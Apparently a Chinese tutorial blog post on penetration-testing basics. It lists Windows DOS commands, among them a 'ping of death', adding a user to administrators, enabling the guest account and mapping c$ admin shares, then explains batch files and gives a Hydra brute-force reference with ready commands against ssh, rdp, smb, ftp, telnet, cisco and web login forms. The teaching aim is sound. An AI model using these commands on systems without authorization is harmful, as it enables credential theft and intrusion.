03.渗透测试基础(3)windows基础

常用DOS命令

  • color ------改变CMD颜色
  • ping -t -l 65550 ip (死亡之ping)
  • ipconfig 查看ip
  • ipconfig/release 释放ip
  • ipconfig/renew 重新获得ip
  • systeminfo 查看系统信息
  • arp -a
  • net view 查看局域网内其他计算机名称
  • shutdown -s -t 时间 -c“ ”
  • dir 查看目录
  • cd 切换目录
  • start 网址 -------打开网页
  • md muluming-----创建目录
  • rd 文件名----删除文件
  • ren 原文件名 新文件名----重命名文件
  • del 删除文件
  • copy con 路径以及文件名 – 创建文件
  • 输入内容
  • Ctrl+z 回车 ------ 创建完成
  • type 文件名—查看文件
  • copy --复制文件
  • move — 移动文件
  • tree —树形列出文件结构
  • telnet —远程连接
  • net use k:\192.168.1.1\c$
  • net use k:\192.168.1.1\c$ /del
  • net start — 查看开启了哪些服务
  • net start 服务名 — 开启服务
  • net stop 服务名 — 停止服务
  • net user 用户名 密码 /add —建立用户
  • net user guest /active:yes — 激活guest用户
  • net user — 查看有哪些用户
  • net user 账户名 —查看账户的属性
  • net localgroup administrators 用户名 /add —把“用户”添加到管理员中使其具有管理员权限
  • net user guset 12345 —用guset用户登录后将密码改为12345
  • net password 密码 —更改系统登录密码
  • net share —查看本的开启的共享
  • net share ipc$ —开启ipc$共享
  • net share ipc$ /del —删除ipc$共享
  • net share c$ /del —删除 C:共享
  • netstat -a —查看开启了哪些端口,常用netstat -an
  • netstat -n —查看端口的网络连接情况
  • netstat -v —查看正在进行的工作
  • at id号 —开启已注册的某个计划任务
  • at /delete —停止所有计划任务,用参数/yes 则不需要确认就直接停止
  • at id号 /delete —停止某个已注册的计划任务
  • at —查看所有的计划任务
  • attrib 文件名(目录名) —查看某文件(目录)的属性
  • attrib 文件名 -A -R -S -H 或 +A +R +S +H —去掉(添加)某文件的存档,只读,系统,隐藏属性;+表示添加

批处理文件

  • 批处理文件是dos命令的组合文件,其中的命令会被逐一执行
  • 后缀名为 .bat
新建批处理文件
  1. 新建文本文档保存,后缀名为.bat
  2. 使用命令
  • copy con XXX.bat
  • net user 用户名 密码 /add
  • …一些想要执行的命令
  • Ctrl+z
  • 回车

爆破工具介绍

hydra

参数详解:
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2…)

使用案例:

使用hydra破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https:

hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:

hydra -P pass.txt IP cisco

hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:

hydra -l administrator -P pass.txt IP smb

破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp:

hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet

hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp:

hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php
post方式提交,破解web登录:
  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:





  假设有以上一个密码登录表单,我们执行命令: # hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^: invalido”   说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。   后面参数是网页中对应的表单字段的name 属性,后面"title" 中的内容是表示错误猜解的返回信息提示,可以自定义。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

生于尘埃

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值